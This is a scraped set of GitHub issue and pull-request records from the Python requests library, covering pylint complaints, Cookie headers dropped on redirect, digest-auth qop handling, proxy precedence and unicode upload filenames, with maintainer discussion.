style, particularly PEP8. Requests does not follow all of PEP8, and this is quite deliberate. You should _always_ consult a project's author before raising a bug report about their code failing a linter.\n2. You should validate the concerns of the linter before raising them. Open source maintainers are often very busy people, and asking them to validate each line of the linter's output for false positives is a rude way to behave. If you'd looked at these 'errors' first you'd have seen that they aren't valid.\n3. It's likely that you'll say we should add a `.pylintrc` file to address these concerns. That's not a good idea. We should not have to add a dotfile to the repository root for every person who writes a linter.\n", "Points taken\n\nMy apology for this faux pas\n\nSent from my iPhone\n\n> On Jan 20, 2015, at 10:19 AM, Cory Benfield [email protected] wrote:\n> \n> To be clear: I do not believe anything that pylint has printed for modules outside requests.packages (which are third party code) is valid. I think everything it has said is wrong. If you can point to something that is not wrong, I will happily consider accepting a change based on it.\n> \n> I agree that pylint can catch errors. However, doing a drive-by dump of every line reported by pylint is not a helpful approach. Two notes for the future:\n> \n> Authors often have different views on Python style, particularly PEP8. Requests does not follow all of PEP8, and this is quite deliberate. You should always consult a project's author before raising a bug report about their code failing a linter.\n> You should validate the concerns of the linter before raising them. Open source maintainers are often very busy people, and asking them to validate each line of the linter's output for false positives is a rude way to behave. If you'd looked at these 'errors' first you'd have seen that they aren't valid.\n> It's likely that you'll say we should add a .pylintrc file to address these concerns. That's not a good idea. We should not have to add a dotfile to the repository root for every person who writes a linter.\n> —\n> Reply to this email directly or view it on GitHub.\n", "@Lukasa \nAre you open to annotating source with comments disabling pylint warnings? Given that one [can](http://docs.pylint.org/faq.html#do-i-have-to-remember-all-these-numbers) use symbolic names of warnings/errors such annotation would serve as documentation at the same time which should be useful.\n", "@piotr-dobrogost Nope. =)\n\nMy concern is the potentially unbounded number of linters that we may be asked to support annotations or dotfiles for. Just because someone created a tool that they love doesn't mean we should add metadata to our codebase to support it. If the requests project uses a tool for its development, we'll add that metadata. Otherwise, we won't.\n", "@piotr-dobrogost Are you open to determining how many of those are false positives and constitute absolutely useless feedback from a linter? The majority of the errors are just plain **wrong** and any changes belong in pylint.\n", "https://github.com/PyCQA/pylint/issues/1411 is the pylint issue which unfortunately indicates that pylint will not support `requests.codes`.\r\n\r\nHowever, a workaround has been suggested for users: `generated-members`, documented in https://pylint.readthedocs.io/en/latest/technical_reference/features.html#id34.", "To be clear, Requests should not add `generated-members` support itself. If folks want to add it to their own CI that’s fine, but pylint’s failure to support this does not place a burden on us to support them.", "@Lukasa - yes, I wrote that comment to try to be helpful for people coming to this issue with the same issue that I had.\r\n\r\nThe hack that I did as a good-enough-for-me workaround was to run:\r\n\r\n```python\r\nimport string\r\n\r\nimport requests\r\n\r\npattern = '(requests\\.)?codes\\.({allowed}),'\r\naccepted_characters = set(string.ascii_letters + '_')\r\nkeys = [key for key in requests.codes.__dict__.keys() if set(key).issubset(accepted_characters)]\r\nprint(pattern.format(allowed='|'.join(keys)))\r\n```\r\n\r\nand then add the outputted string to my `pylint-rc`'s `generated-members` section." ]
https://api.github.com/repos/psf/requests/issues/2416
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2416/labels{/name}
https://api.github.com/repos/psf/requests/issues/2416/comments
https://api.github.com/repos/psf/requests/issues/2416/events
https://github.com/psf/requests/issues/2416
54,884,915
MDU6SXNzdWU1NDg4NDkxNQ==
2,416
Cookie header isn't passed when redirected
{ "avatar_url": "https://avatars.githubusercontent.com/u/1026154?v=4", "events_url": "https://api.github.com/users/Fizzadar/events{/privacy}", "followers_url": "https://api.github.com/users/Fizzadar/followers", "following_url": "https://api.github.com/users/Fizzadar/following{/other_user}", "gists_url": "https://api.github.com/users/Fizzadar/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Fizzadar", "id": 1026154, "login": "Fizzadar", "node_id": "MDQ6VXNlcjEwMjYxNTQ=", "organizations_url": "https://api.github.com/users/Fizzadar/orgs", "received_events_url": "https://api.github.com/users/Fizzadar/received_events", "repos_url": "https://api.github.com/users/Fizzadar/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Fizzadar/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Fizzadar/subscriptions", "type": "User", "url": "https://api.github.com/users/Fizzadar", "user_view_type": "public" }
[]
closed
true
null
[]
null
5
2015-01-20T13:50:37Z
2021-09-08T23:06:04Z
2015-01-22T14:24:32Z
NONE
resolved
The `Cookie` header isn't sent to redirected URL's like other headers is: ``` # Requests version = 2.5.1 ipdb> response.request.headers {'CustomHeader': 'this_still_works!'} ipdb> response.history[0].request.headers {'CustomHeader': 'this_still_works!', 'Cookie': 'token=top_secret_token; email="[email protected]";'} ```
{ "avatar_url": "https://avatars.githubusercontent.com/u/1026154?v=4", "events_url": "https://api.github.com/users/Fizzadar/events{/privacy}", "followers_url": "https://api.github.com/users/Fizzadar/followers", "following_url": "https://api.github.com/users/Fizzadar/following{/other_user}", "gists_url": "https://api.github.com/users/Fizzadar/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Fizzadar", "id": 1026154, "login": "Fizzadar", "node_id": "MDQ6VXNlcjEwMjYxNTQ=", "organizations_url": "https://api.github.com/users/Fizzadar/orgs", "received_events_url": "https://api.github.com/users/Fizzadar/received_events", "repos_url": "https://api.github.com/users/Fizzadar/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Fizzadar/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Fizzadar/subscriptions", "type": "User", "url": "https://api.github.com/users/Fizzadar", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2416/reactions" }
https://api.github.com/repos/psf/requests/issues/2416/timeline
null
completed
null
null
false
[ "There isn't enough information to even begin to debug this. You're clearly being redirected.\n- Are you being redirected to new domain (or sub-domain)? (e.g., from `example.com` to `sub.example.com` or `example.org`)\n- Are you being redirected from `http://` to `https://`?\n- Where does the cookie come from?\n - Do you specify it yourself?\n - Is it in a cookie-jar to start with?\n - Are you using a session that collected the cookie for you?\n\nThese are just starting questions. I guarantee I'll have more once you answer them.\n", "Apologies @sigmavirus24, definitely short on info:\n- Redirect is append-slash like (`dev.local/api/test` -> `dev.local/api/test/`)\n- Both served over HTTP\n- Cookie is set in the headers dict passed to `requests.get`, no jar/session\n\nLet me know if you need anything else.\n", "So we [rebuild](https://github.com/kennethreitz/requests/blob/d2d576b6b1101e2871c82f63adf2c2b534c2dabc/requests/sessions.py#L168..L176) the `Cookie` header on a redirect as a matter of not exposing the cookie to people who shouldn't see it. Without a cookiejar to rebuild _from_ we won't persist the header through the redirect. We already [sanitize authorization](https://github.com/kennethreitz/requests/blob/d2d576b6b1101e2871c82f63adf2c2b534c2dabc/requests/sessions.py#L215) on redirect to different hosts, so we _could_ do the same here.\n\nI want @Lukasa's thoughts on this though before I continue with work for this.\n\nI, for one, think Cookie headers are in the same class as Content-Length and Host headers. They can be set by users but they really _shouldn't_ be set by users because it can do bad things if not handled with care.\n", "Agreed, cookies set in the headers have an unclear scope, so we assume their scope is extremely tight. I think that's a good behaviour.\n", "I agree, it's too much like \"cookie injection\" to send cookies as custom headers through redirects :)\n" ]
https://api.github.com/repos/psf/requests/issues/2415
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2415/labels{/name}
https://api.github.com/repos/psf/requests/issues/2415/comments
https://api.github.com/repos/psf/requests/issues/2415/events
https://github.com/psf/requests/pull/2415
54,830,688
MDExOlB1bGxSZXF1ZXN0Mjc2NDY0Njc=
2,415
Move noncebit to the only place it is used
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[ { "color": "009800", "default": false, "description": null, "id": 44501218, "name": "Ready To Merge", "node_id": "MDU6TGFiZWw0NDUwMTIxOA==", "url": "https://api.github.com/repos/psf/requests/labels/Ready%20To%20Merge" }, { "color": "207de5", "default": false, "description": null, "id": 60620163, "name": "Minion Seal of Approval", "node_id": "MDU6TGFiZWw2MDYyMDE2Mw==", "url": "https://api.github.com/repos/psf/requests/labels/Minion%20Seal%20of%20Approval" } ]
closed
true
null
[]
null
3
2015-01-20T00:51:27Z
2021-09-08T09:01:00Z
2015-01-27T18:22:53Z
CONTRIBUTOR
resolved
Since we only allow for "auth" qop-value, hardcode it Fixes #2408 I want to add tests but I'm not sure a good way to write them. =(
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2415/reactions" }
https://api.github.com/repos/psf/requests/issues/2415/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2415.diff", "html_url": "https://github.com/psf/requests/pull/2415", "merged_at": "2015-01-27T18:22:53Z", "patch_url": "https://github.com/psf/requests/pull/2415.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2415" }
true
[ "I merged the changes into my auth.py and it worked fine, both for my servers which offer qop=\"auth\" and for those which offer qop=\"auth,auth-int\".\nFrom my point of view the issue #2408 is fixed by this commit.\n", "Testing this is a nightmare, it's super stateful and you have to patch time and all sorts of weirdness. Let's just not.\n", "I'm really considering spending a weekend or something adding tests around stuff and re-factoring it because we should be able to add tests for this kind of thing.\n" ]
https://api.github.com/repos/psf/requests/issues/2414
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2414/labels{/name}
https://api.github.com/repos/psf/requests/issues/2414/comments
https://api.github.com/repos/psf/requests/issues/2414/events
https://github.com/psf/requests/issues/2414
54,724,438
MDU6SXNzdWU1NDcyNDQzOA==
2,414
Environment http_proxy will cover the Session property s.proxies
{ "avatar_url": "https://avatars.githubusercontent.com/u/1917483?v=4", "events_url": "https://api.github.com/users/syjiangrui/events{/privacy}", "followers_url": "https://api.github.com/users/syjiangrui/followers", "following_url": "https://api.github.com/users/syjiangrui/following{/other_user}", "gists_url": "https://api.github.com/users/syjiangrui/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/syjiangrui", "id": 1917483, "login": "syjiangrui", "node_id": "MDQ6VXNlcjE5MTc0ODM=", "organizations_url": "https://api.github.com/users/syjiangrui/orgs", "received_events_url": "https://api.github.com/users/syjiangrui/received_events", "repos_url": "https://api.github.com/users/syjiangrui/repos", "site_admin": false, "starred_url": "https://api.github.com/users/syjiangrui/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/syjiangrui/subscriptions", "type": "User", "url": "https://api.github.com/users/syjiangrui", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2015-01-19T04:05:17Z
2021-09-08T23:06:10Z
2015-01-19T08:58:29Z
NONE
resolved
When I use a proxy in my code I find a problem. In the code below ``` python s = requests.Session() s.proxies = {'http':'127.0.0.1:3128'} r = s.get("http://www.apple.com") ``` If I set environmet var http_proxy='http://192.168.1.100:3128' then the request will use environment proxy rather than the proxy I have set in the code. But if I use proxy like below the program will use the proxy which I set in the code. ``` python s = requests.Session() r = s.get("http://www.apple.com", proxies={'http':'127.0.0.1:3128'}) ``` Is there any issue?
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2414/reactions" }
https://api.github.com/repos/psf/requests/issues/2414/timeline
null
completed
null
null
false
[ "Possible duplicate of #2109\n", "Nope, it's a definite duplicate of #2018.\n" ]
https://api.github.com/repos/psf/requests/issues/2413
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2413/labels{/name}
https://api.github.com/repos/psf/requests/issues/2413/comments
https://api.github.com/repos/psf/requests/issues/2413/events
https://github.com/psf/requests/pull/2413
54,724,003
MDExOlB1bGxSZXF1ZXN0Mjc1ODM4OTQ=
2,413
Check that filenames are unicode or bytes
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[ { "color": "009800", "default": false, "description": null, "id": 44501218, "name": "Ready To Merge", "node_id": "MDU6TGFiZWw0NDUwMTIxOA==", "url": "https://api.github.com/repos/psf/requests/labels/Ready%20To%20Merge" }, { "color": "207de5", "default": false, "description": null, "id": 60620163, "name": "Minion Seal of Approval", "node_id": "MDU6TGFiZWw2MDYyMDE2Mw==", "url": "https://api.github.com/repos/psf/requests/labels/Minion%20Seal%20of%20Approval" } ]
closed
true
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
[ { "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" } ]
{ "closed_at": "2015-04-06T01:57:33Z", "closed_issues": 4, "created_at": "2015-01-18T20:07:00Z", "creator": { "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }, "description": "", "due_on": null, "html_url": "https://github.com/psf/requests/milestone/23", "id": 940764, "labels_url": "https://api.github.com/repos/psf/requests/milestones/23/labels", "node_id": "MDk6TWlsZXN0b25lOTQwNzY0", "number": 23, "open_issues": 0, "state": "closed", "title": "2.6.0", "updated_at": "2015-04-06T01:57:33Z", "url": "https://api.github.com/repos/psf/requests/milestones/23" }
4
2015-01-19T03:54:01Z
2021-09-08T09:00:59Z
2015-01-27T18:23:18Z
CONTRIBUTOR
resolved
Instead of only checking one or another type of string-like object that we accept, let's be able to check both. Fixes #2411
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2413/reactions" }
https://api.github.com/repos/psf/requests/issues/2413/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2413.diff", "html_url": "https://github.com/psf/requests/pull/2413", "merged_at": "2015-01-27T18:23:18Z", "patch_url": "https://github.com/psf/requests/pull/2413.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2413" }
true
[ "Why are we not just using `basestring`?\n", "@Lukasa This is what I get for working on this way too late last night.\n\n@arthurdarcet thanks. Done.\n", "Thanks! LGTM. :cake:\n", "@Lukasa fwiw, I edited the commit message on my commit and retitled the PR to be more accurate descriptions of what's happening. The contents of the PR didn't change though.\n" ]
https://api.github.com/repos/psf/requests/issues/2412
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2412/labels{/name}
https://api.github.com/repos/psf/requests/issues/2412/comments
https://api.github.com/repos/psf/requests/issues/2412/events
https://github.com/psf/requests/pull/2412
54,722,570
MDExOlB1bGxSZXF1ZXN0Mjc1ODMwOTA=
2,412
Remove entirely unnecessary and unused bits from requests.compat
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[ { "color": "009800", "default": false, "description": null, "id": 44501218, "name": "Ready To Merge", "node_id": "MDU6TGFiZWw0NDUwMTIxOA==", "url": "https://api.github.com/repos/psf/requests/labels/Ready%20To%20Merge" }, { "color": "207de5", "default": false, "description": null, "id": 60620163, "name": "Minion Seal of Approval", "node_id": "MDU6TGFiZWw2MDYyMDE2Mw==", "url": "https://api.github.com/repos/psf/requests/labels/Minion%20Seal%20of%20Approval" } ]
closed
true
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
[ { "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" } ]
{ "closed_at": "2015-04-06T01:57:33Z", "closed_issues": 4, "created_at": "2015-01-18T20:07:00Z", "creator": { "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }, "description": "", "due_on": null, "html_url": "https://github.com/psf/requests/milestone/23", "id": 940764, "labels_url": "https://api.github.com/repos/psf/requests/milestones/23/labels", "node_id": "MDk6TWlsZXN0b25lOTQwNzY0", "number": 23, "open_issues": 0, "state": "closed", "title": "2.6.0", "updated_at": "2015-04-06T01:57:33Z", "url": "https://api.github.com/repos/psf/requests/milestones/23" }
2
2015-01-19T03:17:36Z
2021-09-08T09:00:58Z
2015-01-27T18:24:25Z
CONTRIBUTOR
resolved
A tiny refactor I noticed while looking into a separate bug.
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2412/reactions" }
https://api.github.com/repos/psf/requests/issues/2412/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2412.diff", "html_url": "https://github.com/psf/requests/pull/2412", "merged_at": "2015-01-27T18:24:25Z", "patch_url": "https://github.com/psf/requests/pull/2412.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2412" }
true
[ "Fine by me. :cake:\n", "Hmmm, interesting.\n" ]
https://api.github.com/repos/psf/requests/issues/2411
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2411/labels{/name}
https://api.github.com/repos/psf/requests/issues/2411/comments
https://api.github.com/repos/psf/requests/issues/2411/events
https://github.com/psf/requests/issues/2411
54,706,715
MDU6SXNzdWU1NDcwNjcxNQ==
2,411
Requests 2.5.1 doesn't recognize unicode filenames for uploads
{ "avatar_url": "https://avatars.githubusercontent.com/u/80012?v=4", "events_url": "https://api.github.com/users/sjagoe/events{/privacy}", "followers_url": "https://api.github.com/users/sjagoe/followers", "following_url": "https://api.github.com/users/sjagoe/following{/other_user}", "gists_url": "https://api.github.com/users/sjagoe/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sjagoe", "id": 80012, "login": "sjagoe", "node_id": "MDQ6VXNlcjgwMDEy", "organizations_url": "https://api.github.com/users/sjagoe/orgs", "received_events_url": "https://api.github.com/users/sjagoe/received_events", "repos_url": "https://api.github.com/users/sjagoe/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sjagoe/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sjagoe/subscriptions", "type": "User", "url": "https://api.github.com/users/sjagoe", "user_view_type": "public" }
[]
closed
true
null
[]
null
19
2015-01-18T19:21:13Z
2021-09-08T23:05:43Z
2015-01-27T18:23:18Z
NONE
resolved
After merge of https://github.com/kennethreitz/requests/pull/2379, to allow filenames to be `int` types, unicode filenames are no longer recognized under Python 2. This checks that the filename is a `builtin` `str`, which has different behaviour on Python 2 and Python 3: `requests/utils.py:118: if name and isinstance(name, builtin_str) and name[0] != '<' and name[-1] != '>':` In `requests/compat.py`, `builtin_str` is defines as `str`, which is non-unicode `bytes` in Python 2 and unicode in Python 3. Perhaps the check should be against basestring, or is this change in behaviour intended?
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
